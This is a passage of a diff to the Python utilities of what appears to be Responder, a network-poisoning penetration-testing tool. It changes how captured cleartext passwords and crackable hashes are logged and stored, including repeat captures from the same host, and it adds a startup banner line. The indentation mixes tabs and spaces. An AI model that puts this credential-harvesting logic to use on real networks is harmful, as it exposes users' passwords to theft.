+		dump.write(data + '\n')
 
 def SaveToDb(result):
 	# Creating the DB if it doesn't exist
@@ -149,7 +161,7 @@ def SaveToDb(result):
 	cursor.text_factory = sqlite3.Binary  # We add a text factory to support different charsets
 	res = cursor.execute("SELECT COUNT(*) AS count FROM responder WHERE module=? AND type=? AND client=? AND LOWER(user)=LOWER(?)", (result['module'], result['type'], result['client'], result['user']))
 	(count,) = res.fetchone()
-
+        
 	if not count:
 		with open(logfile,"a") as outf:
 			if len(result['cleartext']):  # If we obtained cleartext credentials, write them to file
@@ -160,34 +172,41 @@ def SaveToDb(result):
 		cursor.execute("INSERT INTO responder VALUES(datetime('now'), ?, ?, ?, ?, ?, ?, ?, ?)", (result['module'], result['type'], result['client'], result['hostname'], result['user'], result['cleartext'], result['hash'], result['fullhash']))
 		cursor.commit()
 
+        if settings.Config.CaptureMultipleHashFromSameHost:
+		with open(logfile,"a") as outf:
+			if len(result['cleartext']):  # If we obtained cleartext credentials, write them to file
+				outf.write('%s:%s\n' % (result['user'].encode('utf8', 'replace'), result['cleartext'].encode('utf8', 'replace')))
+			else:  # Otherwise, write JtR-style hash string to file
+				outf.write(result['fullhash'].encode('utf8', 'replace') + '\n')
 
 	if not count or settings.Config.Verbose:  # Print output
 		if len(result['client']):
 			print text("[%s] %s Client   : %s" % (result['module'], result['type'], color(result['client'], 3)))
-                        textlogging("[%s] %s Client   : %s" % (result['module'], result['type'], result['client']))
+
 		if len(result['hostname']):
 			print text("[%s] %s Hostname : %s" % (result['module'], result['type'], color(result['hostname'], 3)))
-                        textlogging("[%s] %s Hostname : %s" % (result['module'], result['type'], result['hostname']))
+
 		if len(result['user']):
 			print text("[%s] %s Username : %s" % (result['module'], result['type'], color(result['user'], 3)))
-                        textlogging("[%s] %s Username : %s" % (result['module'], result['type'], result['user']))
+
 		# Bu order of priority, print cleartext, fullhash, or hash
 		if len(result['cleartext']):
 			print text("[%s] %s Password : %s" % (result['module'], result['type'], color(result['cleartext'], 3)))
-                        textlogging("[%s] %s Password : %s" % (result['module'], result['type'], result['cleartext']))
+
 		elif len(result['fullhash']):
 			print text("[%s] %s Hash     : %s" % (result['module'], result['type'], color(result['fullhash'], 3)))
-                        textlogging("[%s] %s Hash     : %s" % (result['module'], result['type'], result['fullhash']))
+
 		elif len(result['hash']):
 			print text("[%s] %s Hash     : %s" % (result['module'], result['type'], color(result['hash'], 3)))
-                        textlogging("[%s] %s Hash     : %s" % (result['module'], result['type'], result['hash']))
+
 		# Appending auto-ignore list if required
 		# Except if this is a machine account's hash
 		if settings.Config.AutoIgnore and not result['user'].endswith('$'):
 			settings.Config.AutoIgnoreList.append(result['client'])
 			print color('[*] Adding client %s to auto-ignore list' % result['client'], 4, 1)
 	else:
-		print color('[*]', 3, 1), 'Skipping previously captured hash for %s' % result['user']
+		print color('[*] Skipping previously captured hash for %s' % result['user'], 3, 1)
+		text('[*] Skipping previously captured hash for %s' % result['user'])
 		cursor.execute("UPDATE responder SET timestamp=datetime('now') WHERE user=? AND client=?", (result['user'], result['client']))
 		cursor.commit()
 	cursor.close()
@@ -262,6 +281,7 @@ def StartupMessage():
 	print '    %-27s' % "HTTP server" + (enabled if settings.Config.HTTP_On_Off else disabled)
 	print '    %-27s' % "HTTPS server" + (enabled if settings.Config.SSL_On_Off else disabled)
 	print '    %-27s' % "WPAD proxy" + (enabled if settings.Config.WPAD_On_Off else disabled)
+	print '    %-27s' % "Auth proxy" + (enabled if settings.Config.ProxyAuth_On_Off else disabled)
 	print '    %-27s' % "SMB server" + (enabled if settings.Config.SMB_On_Off else disabled)
 	print '    %-27s' % "Kerberos server" + (enabled if settings.Config.Krb_On_Off else disabled)
 	print '    %-27s' % "SQL server" + (enabled if settings.Config.SQL_On_Off else disabled)
@@ -306,40 +326,3 @@ def StartupMessage():
 		print '    %-27s' % "Don't Respond To Names" + color(str(settings.Config.DontRespondToName), 5, 1)
 	print "\n\n"
 
-
-# Useful for debugging
-def hexdump(src, l=0x16):
-	res = []
-	sep = '.'
-	src = str(src)
-
-	for i in range(0, len(src), l):
-		s = src[i:i+l]
-		hexa = ''
-
-		for h in range(0,len(s)):
-			if h == l/2:
-				hexa += ' '
-			h = s[h]
-			if not isinstance(h, int):
-				h = ord(h)
-			h = hex(h).replace('0x','')
-			if len(h) == 1:
-				h = '0'+h
-			hexa += h + ' '
-
-		hexa = hexa.strip(' ')
-		text = ''
-
-		for c in s:
-			if not isinstance(c, int):
-				c = ord(c)
-
-			if 0x20 <= c < 0x7F:
-				text += chr(c)
-			else:
-				text += sep
-
-		res.append(('%08X:  %-'+str(l*(2+1)+1)+'s  |%s|') % (i, hexa, text))
-
-	return '\n'.join(res)